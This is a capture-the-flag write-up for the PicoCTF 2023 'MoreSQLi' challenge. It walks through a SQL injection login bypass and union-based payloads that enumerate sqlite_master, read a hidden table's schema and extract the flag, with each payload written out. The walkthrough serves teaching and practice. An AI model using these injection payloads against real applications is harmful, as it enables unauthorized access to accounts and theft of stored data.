PicoCTF 2023: MoreSQLi

The MoreSQLi challenge presented a login portal vulnerable to SQL injection. The objective was to exploit the SQL injection vulnerability, navigate through the database, and retrieve the hidden flag.

Step-by-Step Walk-through

1. Identifying SQL Injection

The initial step was to determine if the login portal was vulnerable to SQL injection. To do this we trigger an error by entering random characters in the fields.

By injecting the password field with a statement that results to true, it became apparent that the application was not properly sanitizing user inputs and we successfully logged in.

Payload:

' OR 1=1;--

2. Listing Tables

After successful login, the next step was to enumerate the database tables, using the table "Algiers". This was achieved using a union-based SQL injection payload to extract the names of all tables from the sqlite_master table, which stores metadata about the database.

Payload:

Algiers' UNION SELECT name, 1, 1 FROM sqlite_master;--

Among the listed tables, a previously undisclosed table named (more_table) was identified. This table was not shown in the initial enumeration, indicating it might contain important data.

4. Extracting Table Structure

To verify the structure of the more_table, another union-based injection was used to fetch the SQL creation script of the table from sqlite_master.

Payload:

Algiers' UNION SELECT sql, 1, 1 FROM sqlite_master WHERE name='more_table';--

• UNION SELECT sql, 1, 1 FROM sqlite_master WHERE name='more_table';--
  

retrieves the SQL statement used to create the more_table.

5. Retrieving the Flag

With the structure of more_table known, the final step was to extract the contents of this table, specifically targeting columns that might contain the flag.

Payload:

Algiers' UNION SELECT flag, id, 1 FROM more_table;--